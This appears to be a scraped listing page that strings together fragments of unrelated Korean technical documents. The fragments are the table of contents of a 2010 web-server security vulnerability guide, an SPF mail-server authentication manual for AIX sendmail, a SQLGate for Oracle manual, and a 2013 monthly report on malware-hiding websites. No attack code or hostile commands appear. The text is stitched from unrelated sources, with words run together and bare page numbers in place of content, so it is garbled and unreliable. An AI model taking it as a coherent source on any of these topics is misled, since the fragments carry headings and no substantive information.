웹서버보안취약점대응및조치 2010. 5. 교육사이버안전센터 목차 Ⅰ 웹보안개요 Ⅱ Ⅲ Ⅳ 최신기술동향주요해킹기술및대응방안취약점사고사례 Ⅴ 참고자료 Ⅰ 웹보안개요 I. 웹보안개요 1. 웹구조의이해 URL: 프로토콜 :// 호스트명 [: 포트번호 ]/[ 경로 /] 파일명 [?Param= 값 ] HTTP: // www.ecsc.go.kr / Login.jsp? User=name
More information메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail 8.13.4 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. sendmail, SPF
More information제목을 입력하세요.
1. 4 1.1. SQLGate for Oracle? 4 1.2. 4 1.3. 5 1.4. 7 2. SQLGate for Oracle 9 2.1. 9 2.2. 10 2.3. 10 2.4. 13 3. SQLGate for Oracle 15 3.1. Connection 15 Connect 15 Multi Connect 17 Disconnect 18 3.2. Query
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More information